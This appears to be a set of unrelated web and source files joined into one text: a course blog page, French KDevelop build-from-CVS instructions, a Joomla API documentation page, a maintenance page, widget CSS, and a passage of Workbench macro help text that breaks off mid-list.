<div class="breadcrumb"><a href="../../../index.html">Home</a></div> <h1 class="title">Kinko's</h1>
<!-- start main content -->
<div class="node">
<h1 class="title"><a href="../../../node/259/index.html">Bathtime with Braughtigan</a></h1>
<span class="submitted">Submitted by achillesheel on 19 October 2006 - 10:24pm.</span>
<span class="taxonomy"><ul class="links inline"><li class="first taxonomy_term_271"><a href="../271/index.html" rel="tag" title="" class="taxonomy_term_271">Beats</a></li>
<li class="taxonomy_term_270"><a href="index.html" rel="tag" title="" class="taxonomy_term_270 active">Kinko's</a></li>
<li class="taxonomy_term_269"><a href="../269/index.html" rel="tag" title="" class="taxonomy_term_269">rags</a></li>
<li class="last taxonomy_term_268"><a href="../268/index.html" rel="tag" title="" class="taxonomy_term_268">refrigerators</a></li>
</ul></span>
<div class="content"><p>So I'm reading this article about Eric Ernest Johnson (a poet/painter/musician/carpenter in LA - no idea why he's being written about, but its the LA weekly and they do that kind of thing). The interview is in his home and he's smoking and drinking wine and listening to a recording of Richard Brautigan reading his poems (RB was a poet/writer mostly in the 60s, most famous for a book called "Trout Fishing in America" *described by Michael McClure (whoever he was): "there's nothing resembling it in American writing. It's as West Coast as a Douglas-fir, but more broadly it's peculiarly American and Rube Goldbergian.</p>
</div>
<div class="links">» <ul class="links inline"><li class="first blog_usernames_blog"><a href="../../../blog/7/index.html" title="Read achillesheel's latest blog entries." class="blog_usernames_blog">achillesheel's blog</a></li>
<li class="last node_read_more"><a href="../../../node/259/index.html" title="Read the rest of this posting." class="node_read_more">Read more</a></li>
</ul></div>
</div>
<!-- end main content -->
</div><!-- main -->
</td>
<td id="sidebar-right">
<div class="block block-block" id="block-block-2">
<div class="title"><h3>Links</h3></div>
<div class="content"><p>blogs about electronic writing, reading, and publishing:</p>
<ul>
<li><a href="http://grandtextauto.gatech.edu/" target="_blank">Grand Text Auto</a></li>
<li><a href="http://www.futureofthebook.com/blog" target="_blank">if:book</a></li>
<li><a href="http://www.jilltxt.net" target="_blank">jill/txt</a></li>
<li><a href="http://misc.wordherders.net/" target="_blank">Miscellany is the Largest Category</a></li>
</ul>
<p></p>
<p>other interesting academic blogs:</p>
<ul>
<li><a href="http://www.michaelberube.com/index.php" target="_blank">Michael Bérubé</a></li>
<li><a href="http://bitchphd.blogspot.com/" target="_blank">Bitch, PhD</a></li>
<li><a href="http://www.itofisher.com/mito/" target="_blank">Mimi Ito</a></li>
<li><a href="http://www.henryjenkins.org/" target="_blank">Henry Jenkins</a></li>
<li><a href="http://chutry.wordherders.net/" target="_blank">Chuck Tryon</a></li>
<li><a href="http://www.thevalve.org/go" target="_blank">The Valve</a></li>
</ul>
<p></p>
<p>personal blogs everyone should read:</p>
<ul>
<li><a href="http://www.dooce.com/" target="_blank">Dooce</a></li>
<li><a href="http://www.alittlepregnant.com/alittlepregnant/" target="_blank">A Little Pregnant</a></li>
<li><a href="http://tinycatpants.squarespace.com/journal/" target="_blank">Tiny Cat Pants</a></li>
</ul>
<p></p>
<p>blogs about authorship, on some level, at least:</p>
<ul>
<li><a href="http://belledejour-uk.blogspot.com/" target="_blank">Belle de Jour</a></li>
</ul>
<p><a href="mailto:kfitzpatrickATpomonaDOTedu">suggest a link</a></p>
</div>
</div> </td>
</tr>
</table>
<table id="footer-menu" summary="Navigation elements." border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="center" valign="middle">
<div class="primary-links">
<ul class="links"><li class="first menu-1-1-2"><a href="http://machines.plannedobsolescence.net" class="menu-1-1-2">kathleen fitzpatrick</a></li>
<li class="last menu-1-2-2"><a href="http://sakai.claremont.edu/portal/site/CX_mtg_23932" class="menu-1-2-2">course sakai site</a></li>
</ul> </div>
</td>
</tr>
</table>
<div id="footer-message">
<p><a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/"><img alt="Creative Commons License" border="0" src="http://creativecommons.org/images/public/somerights20.png" /></a><br />This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/">Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License</a>.
</p>
</div>
</body>
</html>
<!-- Localized --> |
lang/fr/3.0/branches_compiling.html | KDE/kdev-www | <?php include_file("$k_base_version/cvsbranches.ihtml"); // this is a trick to pass a non-existing path to the include_file() ?>
<?php module_head("Instructions pour une version compilée de KDevelop 3.0.x"); ?>
Veuillez d'abord obtenir les sources pour <b>KDE_3_2_BRANCH</b> comme il est expliqué ci-dessous.
<br>
Avant de continuer, veuillez vérifier que votre ordinateur a tous les <a href="index.html?filename=3.0/requirements.html">logiciels requis</a> instalés.
<br>
<br>
Initia;iser le système de compilation :
<pre>
$ cd kdevelop
$ make -f admin/Makefile.common cvs-clean
$ make -f Makefile.cvs
</pre>
<?php
include_file("3.0/compiling.ihtml");
module_tail();
module_head("Comment garder votre version à jour");
?>
<br>
Après avoir téléchargé et compilé l'une des branches CVS
ci-dessus, vous voulez la garder à jour pour vous procurer tous les correctifs.
Pour éviter d'avoir à taper toutes les commandes qui fixent les variables d'environnement
nécessaires chaque fois que vous faites une mise à jour, vous pouvez les inclure dans votre fichier
.cshrc ou .bashrc.<br>
Si vous utilisez le shell bash, veuillez ajouter les lignes suivantes :<br>
<pre>
export KDEDIR=/où/est/votre/kde3
export QTDIR=/où/est/votre/qt3
export LD_LIBRARY_PATH=$QTDIR/lib:$KDEDIR/lib:$LD_LIBRARY_PATH
export LIBRARY_PATH=$QTDIR/lib:$KDEDIR/lib:$LIBRARY_PATH
export PATH=$QTDIR/bin:$KDEDIR/bin:$PATH
</pre>
Si vous utilisez tcsh, veuillez ajouter les lignes suivantes :<br>
<pre>
setenv KDEDIR /où/est/votre/kde3
setenv QTDIR /où/est/votre/qt3
setenv LD_LIBRARY_PATH $QTDIR/lib:$KDEDIR/lib:$LD_LIBRARY_PATH
setenv LIBRARY_PATH $QTDIR/lib:$KDEDIR/lib:$LIBRARY_PATH
setenv PATH $QTDIR/bin:$KDEDIR/bin:$PATH
</pre>
<P>
<b>Note :</b> Pour des raisons évidentes, vous devez éditer les deux premières lignes pour qu'elles correspondent à votre configuration :)<br>
</p>
<br>
Allez ensuite dans le répertoire où vous avez mis les sources de <i>kdevelop de CVS</i> et entrez la commande de mise à jour :<br>
<pre>
$ cd où_kde3src_est/kdevelop
$ cvs update -dP
</pre>
<br>
L'étape suivante dépend du résultat de la commande précédente :<br>
Si vous obtenez quelque chose comme :<br>
U /chemin_vers_un_répertoire/Makefile.am<br>
Vous devrez faire :<br>
<pre>
$ make -f Makefile.cvs
</pre>
puis _TOUTES_ les étapes suivantes.<br>
<br>
Si vous obtenez quelque chose comme :<br>
P /chemin_vers_un_répertoire/Makefile.am<br>
Vous devrez faire :<br>
<pre>
$ ./configure --enable-debug=full --prefix=$KDEDIR --with-kdelibsdoxy-dir=$KDEDIR/share/doc/HTML/en/kdelibs-apidocs
</pre>
puis _TOUTES_ les étapes suivantes.<br>
<pre>
$ make
$ make install (as root)
</pre>
Si pour une raison quelconque, la commande make échoue, vous pouvez la forcer
à ignorer les erreurs avec l'option -k. Selon la gravité de l'erreur, vous
allez vous retrouver avec une version fonctionnant ou non de kdevelop. Aussi faites le "make
-k install" à vos propres risques !!!. De toute façon, ces erreurs sont corrigées après environ deux heures donc vous devriez essayer de faire une
mise à jour avant la dangeureuse commande :) make install.<br>
<pre>
$ make -k
$ make -k install (en tant que root)
</pre>
Voilà ! Vous avez maintenant la version la plus à jour de KDevelop. Pour la lancer, veuillez entrer :<br>
<pre>
$ kdevelop
</pre>
Tout ce que vous devez faire pour la garder à jour est de répéter ces étapes chaque fois que quelqu'un dans la liste de diffusion de <a href="index.html?filename=mailinglist.html">kdevelop-devel</a>
corrige une bogue. <br>
Donc vous êtes fortement encouragé à <a href="index.html?filename=mailinglist.html">joindre
cette liste de diffusion</a>.<br><br><br>
Vous devez rapporter les bogues que vous trouvez grâce à la <a
href="http://bugs.kde.org/wizard.cgi">forme de soumission des bogues</a>.<br>
Vous ne devez <b>pas</b> rapporter des erreurs de compilation
dans la base de données des bogues. Pour les erreurs de compilation, veuillez plutôt utiliser la
<a href="index.html?filename=mailinglist.html">liste de diffusion</a>.<br>
<br>
Vous pouvez regarder les bogues dans <a
href="http://bugs.kde.org/buglist.cgi?product=kdevelop&bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&order=map_components.name,bugs.bug_id">la base de donnée des bogues</a>.<br>
<?php module_tail();
module_head("Comment compiler pour FreeBSD"); ?><br>
Veuillez suivre les instructions normales mais utiliser gmake au lieu de make et après
<pre>
$ gmake -f Makefile.cvs
</pre>
faites :
<pre>
$ export CXXFLAGS="-L/usr/X11R6/lib -I/usr/local/include/db41 -I/usr/local/include -L/usr/local/lib -I/usr/X11R6/include"
</pre>
Veuillez noter que vous avez besoin de la base de données berkeley db 4.1 installée, si vous avez une autre version, vous devez juste ajuster le chemin.<br>
Changez la ligne "ac_cv_bdb=no" pour "ac_cv_bdb=yes" dans le fichier de configuration car sinon configure n'arrive pas à trouver les bibliothèques de la base de données.<br>
Pour savoir quelle version est installée sur votre système :
<pre>
$ pkg_info | grep db41
db41-4.1.25_1 The Berkeley DB package, revision 4.1
</pre>
Les gens de FreeBSD l'ont appelée non plus libdb.so mais libdbxx.so. Donc remplacez "-ldb" par "-ldb41" dans lib/catalog/Makefile.am<br>
Vous pouvez ensuite continuer le processus normal :
<pre>
$ ./configure --prefix=/blah --enable-debug=full
</pre>
<?php module_tail(); ?>
|
utf8/strings/_libraries---phputf8---native---core.php.html | asika32764/Joomla-CMS-API-Document | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- template designed by Marco Von Ballmoos -->
<title>Docs for page core.php</title>
<link rel="stylesheet" href="../../media/stylesheet.css" />
<script src="../../media/lib/classTree.js"></script>
<script language="javascript" type="text/javascript">
var imgPlus = new Image();
var imgMinus = new Image();
imgPlus.src = "../../media/images/plus.png";
imgMinus.src = "../../media/images/minus.png";
function showNode(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
var oImg = document.layers["img" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
var oImg = document.all["img" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
var oImg = document.getElementById("img" + Node);
break;
}
oImg.src = imgMinus.src;
oTable.style.display = "block";
}
function hideNode(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
var oImg = document.layers["img" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
var oImg = document.all["img" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
var oImg = document.getElementById("img" + Node);
break;
}
oImg.src = imgPlus.src;
oTable.style.display = "none";
}
function nodeIsVisible(Node){
switch(navigator.family){
case 'nn4':
// Nav 4.x code fork...
var oTable = document.layers["span" + Node];
break;
case 'ie4':
// IE 4/5 code fork...
var oTable = document.all["span" + Node];
break;
case 'gecko':
// Standards Compliant code fork...
var oTable = document.getElementById("span" + Node);
break;
}
return (oTable && oTable.style.display == "block");
}
function toggleNodeVisibility(Node){
if (nodeIsVisible(Node)){
hideNode(Node);
}else{
showNode(Node);
}
}
</script>
</head>
<body>
<div class="page-body">
<h2 class="file-name"><img src="../../media/images/Page_logo.png" alt="File" style="vertical-align: middle">/libraries/phputf8/native/core.php</h2>
<a name="sec-description"></a>
<div class="info-box">
<div class="info-box-title">Description</div>
<div class="nav-bar">
</div>
<div class="info-box-body">
<!-- ========== Info from phpDoc block ========= -->
<ul class="tags">
<li><span class="field">version:</span> $Id$</li>
<li><span class="field">filesource:</span> <a href="../../filesource/fsource_utf8_strings_librariesphputf8nativecore.php.html">Source Code for this file</a></li>
</ul>
</div>
</div>
<p class="notes" id="credit">
Documentation generated on Tue, 19 Nov 2013 14:57:34 +0100 by <a href="http://www.phpdoc.org" target="_blank">phpDocumentor 1.4.3</a>
</p>
</div></body>
</html> |
maintenance.html | tgm-brain/tgm-brain.github.io | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>B.R.A.I.N TGM</title>
<!-- Bootstrap Core CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
<link href="internal/css/bootstrap.min.css" rel="stylesheet">
<!-- Custom CSS -->
<link href="internal/css/business-casual.css" rel="stylesheet">
<!-- Fonts -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css">
<link href="http://fonts.googleapis.com/css?family=Josefin+Slab:100,300,400,600,700,100italic,300italic,400italic,600italic,700italic" rel="stylesheet" type="text/css">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
<script>
$(function(){
$("#headerContent").load("header.html");
});
</script>
</head>
<body>
<div class="brand">B.R.A.I.N. Ruled Artificial Intelligence Networks</div>
<div class="address-bar">Wextrasse 19-23 | Wien, 1200 | Tel: 123.456.7890</div>
<!-- Navigation -->
<nav class="navbar navbar-default" role="navigation">
<div id="headerContent"></div>
<div class="container">
<!-- Brand and toggle get grouped for better mobile display -->
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<!-- navbar-brand is hidden on larger screens, but visible when the menu is collapsed -->
<a class="navbar-brand" href="index.html">B.R.A.I.N.</a>
</div>
<!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav">
<li>
<a href="#">Maintenance</a>
</li>
</ul>
</div>
<!-- /.navbar-collapse -->
</div>
<!-- /.container -->
</nav>
<div class="container">
<div class="row">
<div class="box">
<p class="col-lg-12" align="center">
currently under maintenance!<br>
<i class="fa fa-pencil fa-spin fa-4x"></i><br>
so keep your heads up!
</p>
</div>
</div>
</div>
<!-- /.container fa-circle-o-notch-->
<footer>
<div class="container">
<div class="row">
<div class="col-lg-12 text-center">
<p> <img src="internal/static/TGM_Logo_solo.png" align="left" height="75"> <img src="internal/static/BRAIN_LOGO.PNG" height="100"/> <img src="internal/static/it_logo.png" height="75" align="right"></p>
</div>
</div>
</div>
</footer>
<!-- jQuery -->
<script src="js/jquery.js"></script>
<!-- Bootstrap Core JavaScript -->
<script src="js/bootstrap.min.js"></script>
<!-- Script to Activate the Carousel -->
<script>
$('.carousel').carousel({
interval: 5000 //changes the speed
})
</script>
</body>
</html>
|
wp-content/plugins/black-studio-tinymce-widget/css/black-studio-tinymce-widget.css | npalomares/wp_starter | /* Black Studio TinyMCE Widget - CSS */
.bstw-links {
font-size: 11px;
margin-top: -3px;
text-align: right;
position: absolute;
right: 18px;
}
.bstw-links .icon16:before {
padding: 0;
}
.bstw-links .icon16 {
float: right;
padding: 3px 6px;
margin: -6px -8px 0 -2px;
}
.bstw-links .bstw-links-list {
display: none;
}
.bstw-links a {
text-decoration: none;
}
#wp-black-studio-tinymce-widget-wrap {
display: none;
}
div[id*="black-studio-tinymce"] .wp-editor-wrap {
margin-bottom: 1em;
}
#available-widgets [class*="black-studio-tinymce"] .widget-title:before {
content: "\f116";
}
.wp-customizer .mce-floatpanel.mce-popover {
z-index: 500000 !important;
}
#TB_overlay, #TB_window {
z-index: 999999 !important;
}
body.wait, body.wait * {
cursor: wait !important;
}
#zedity_content_overlay {
z-index: 100000 !important;
} |
src/Resources/Help/HelpFiles/Macros/MacrosWorkbench.html | Washington-University/workbench | <html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=utf-8">
<meta name=Generator content="Microsoft Word 15 (filtered)">
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
{font-family:"Calibri Light";
panose-1:2 15 3 2 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
font-size:12.0pt;
font-family:"Calibri",sans-serif;}
h1
{mso-style-link:"Heading 1 Char";
margin-top:12.0pt;
margin-right:0in;
margin-bottom:0in;
margin-left:0in;
page-break-after:avoid;
font-size:16.0pt;
font-family:"Calibri Light",sans-serif;
color:#2F5496;
font-weight:normal;}
h2
{mso-style-link:"Heading 2 Char";
margin-top:2.0pt;
margin-right:0in;
margin-bottom:0in;
margin-left:0in;
page-break-after:avoid;
font-size:13.0pt;
font-family:"Calibri Light",sans-serif;
color:#2F5496;
font-weight:normal;}
p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph
{margin-top:0in;
margin-right:0in;
margin-bottom:0in;
margin-left:.5in;
font-size:12.0pt;
font-family:"Calibri",sans-serif;}
p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst
{margin-top:0in;
margin-right:0in;
margin-bottom:0in;
margin-left:.5in;
font-size:12.0pt;
font-family:"Calibri",sans-serif;}
p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle
{margin-top:0in;
margin-right:0in;
margin-bottom:0in;
margin-left:.5in;
font-size:12.0pt;
font-family:"Calibri",sans-serif;}
p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast
{margin-top:0in;
margin-right:0in;
margin-bottom:0in;
margin-left:.5in;
font-size:12.0pt;
font-family:"Calibri",sans-serif;}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-link:"Heading 1";
font-family:"Calibri Light",sans-serif;
color:#2F5496;}
span.Heading2Char
{mso-style-name:"Heading 2 Char";
mso-style-link:"Heading 2";
font-family:"Calibri Light",sans-serif;
color:#2F5496;}
.MsoChpDefault
{font-family:"Calibri",sans-serif;}
@page WordSection1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
{page:WordSection1;}
/* List Definitions */
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
-->
</style>
</head>
<body lang=EN-US style='word-wrap:break-word'>
<div class=WordSection1>
<h1>Macros Overview</h1>
<p class=MsoNormal><span style='font-size:14.0pt'> </span></p>
<p class=MsoNormal><span style='font-size:14.0pt'>Two new features have been
added and continue to be updated in wb_view. The first new feature, macros,
permit the automation of a sequence of commands in wb_view. These commands
encompass events from user-interface controls and special complex operations.
Facilities exist for creating macros by recording user interactions with the
user-interface and manual editing of the macros. In addition, the macro system
is integrated with another new feature, a new and improved movie creation
system.</span></p>
<p class=MsoNormal><span style='font-size:14.0pt'> </span></p>
<p class=MsoNormal><span style='font-size:14.0pt'>The macro system in wb_view
is similar to the macro systems in other software applications such as
Microsoft Office including PowerPoint’s animation system.</span></p>
<p class=MsoNormal><span style='font-size:14.0pt'>In wb_view, the user can
record a macro while interacting that forms a sequence of commands from the
user interacting with the controls in wb_view. In addition, facilities are
available to edit a macro and to add, delete, or move commands within the
macro. In addition, there are special complex commands the user may insert
into a macro. For the most part, these special commands perform an animation-like
operation.</span></p>
<p class=MsoNormal><span style='font-size:14.0pt'> </span></p>
<p class=MsoNormal><b><span style='font-size:14.0pt'>In the current
implementation, macros are always associated with the ‘current scene’.</span></b><span
style='font-size:14.0pt'> The current scene is either the most recently
created or loaded scene. In most cases, the current scene defines valid
preconditions for running of an associated macro<b>. In the future, macros may
also be stored in files or in the user’s preferences in order to simply a
sequence of operations in wb_view.</b> In addition, a designated ‘command key
can be assigned to macro to simplify execution of the macro. For example, a
macro that selects a particular volume slice view and selects slices at a
particular coordinate.</span></p>
<p class=MsoNormal><span style='font-size:14.0pt'> </span></p>
<p class=MsoNormal><span style='font-size:14.0pt'>As previously mentioned, the
macro system is integrated with a new movie creation system. To simplify movie
creation, the user may create a macro that generates all commands needed to
create the movie. One key feature in the macro system allows the user to
specify a delay before the execution of a macro command and a duration for
special commands. This time duration, along with the movie system’s frame rate
(number of frames per second), results in the related section in the movie
running for the requested amount of time. For example, the special command for
Surface Interpolation requires the user to enter the starting surface, ending
surface, and a time duration. Wb_view will determine the number of iterations
in the interpolation operation so that the interpolation runs for the requested
duration in the movie. Note that a larger duration or higher frame rate
results in a smoother animation operation.</span></p>
<p class=MsoNormal><span style='font-size:14.0pt'> </span></p>
<p class=MsoNormal><span style='font-size:14.0pt'> </span></p>
<h1>Macro Menu</h1>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Macros…. – Displays the Macro Dialog for editing and running
macros. A button in the toolbar also will display this dialog.</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Start Recording New Macro… Displays a dialog for recording a
macro from selections made in the GUI. Recording of a new macro is also
available by pressing the Record button on the Macro Dialog.</p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Stop Recording New Macro – Select this item to finish recording
of a macro</p>
<p class=MsoNormal> </p>
<p class=MsoNormal> </p>
<h2>Record Macro Dialog</h2>
<p class=MsoNormal> </p>
<p class=MsoNormal><img width=327 height=249 id="Picture 1"
src="MacrosWorkbench.fld/image001.png"></p>
<p class=MsoNormal> </p>
<p class=MsoNormal> </p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Store macro in – Chooses where the macro is placed. Choices are
the current scene or into the user’s preferences (disabled at this time)</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Macro name – Name for the macro</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Short Cut Key – Allows user to launch the macro using a short cut
key instead of running the macro from the macro dialog (primarily aimed at
macros stored in the preferences)</p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Description – User should enter a description of the macro in
this text box</p>
<p class=MsoNormal> </p>
<p class=MsoNormal>After pressing the OK button, make selections in the GUI.
When finished, select Stop Recording from the Macro Menu.</p>
<p class=MsoNormal> </p>
<p class=MsoNormal><span class=Heading1Char><span style='font-size:16.0pt'>Macro
Dialog with Macro Selected</span></span><img width=327 height=523 id="Picture 7"
src="MacrosWorkbench.fld/image002.png"></p>
<p class=MsoNormal> </p>
<p class=MsoNormal> </p>
<p class=MsoNormal>Top Row Buttons</p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Macros in – Selects macros displayed in the dialog. Macros are
available from the current scene or preferences</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Reload button (curly arrow) – Reloads the current scene</p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Import/Export (…) – Allows import or export of the macro group</p>
<p class=MsoNormal> </p>
<p class=MsoNormal>Second Row Buttons</p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Stop – Stops a macro that is running or stops recording of a new
macro.</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Run – Run the selected macro (this button is only enabled when a
macro is selected (it is disabled if a command is selected)</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Pause – Pauses the currently running macro. Pressing the button
while a macro is paused will resume execution of the macro.</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Record – When recording is off, a red outline circle is
displayed. Pressing the button while it is in this state will display the
Record Button Menu as described below. When recording is active, a red filled
circle is displayed and pressing the button will top recording. </p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Insert (Plus) – Allows insertion of new macros or insertion of
commands into an existing macro. See Insert Button Menu below</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Up Arrow – Move the selected item up one position</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Down Arrow – Move the selected item down one position</p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>X – Delete the selected item (macro or macro command)</p>
<p class=MsoNormal> </p>
<p class=MsoNormal>Record Button Menu</p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Record and Insert New Commands Below – Starts recording new
command from the user interacting with the user-interface.</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Record and Insert New Macro Below – Starts recording a new macro
from the user interacting with the user-interface.</p>
<p class=MsoListParagraphCxSpLast> </p>
<p class=MsoNormal>Insert (plus) button Menu</p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Insert New Command Below – Displays the Add Macro Command for
inserting a new command. </p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Copy and Insert Macro Below – Copies and inserts a macro,
possibly from another scene.</p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Insert New Macro Below – Inserts a new, empty macro.</p>
<p class=MsoNormal> </p>
<p class=MsoNormal> </p>
<p class=MsoNormal>The list view contains macro and macro commands. A macro
has an arrow button on its left side that can be toggled to show the commands
within the macro.</p>
<p class=MsoNormal> </p>
<p class=MsoNormal>Macro -</p>
<p class=MsoNormal> </p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Name – Allows editing of the macro’s name</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Short Cut Key – Allows assignment of a short cut key to the macro</p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Description – Allows editing of the macro’s description</p>
<p class=MsoNormal> </p>
<p class=MsoNormal>Run Macro Options</p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Window – Selects window in which macro runs</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Loop – Macro loops continuously until it is stopped and reloads
the current scene when at the end of the loop</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Ignore delays and durations – While a macro is running, all delay
times are ignored and for in iterative command, the iterations are limited to
the first and last iterations.</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
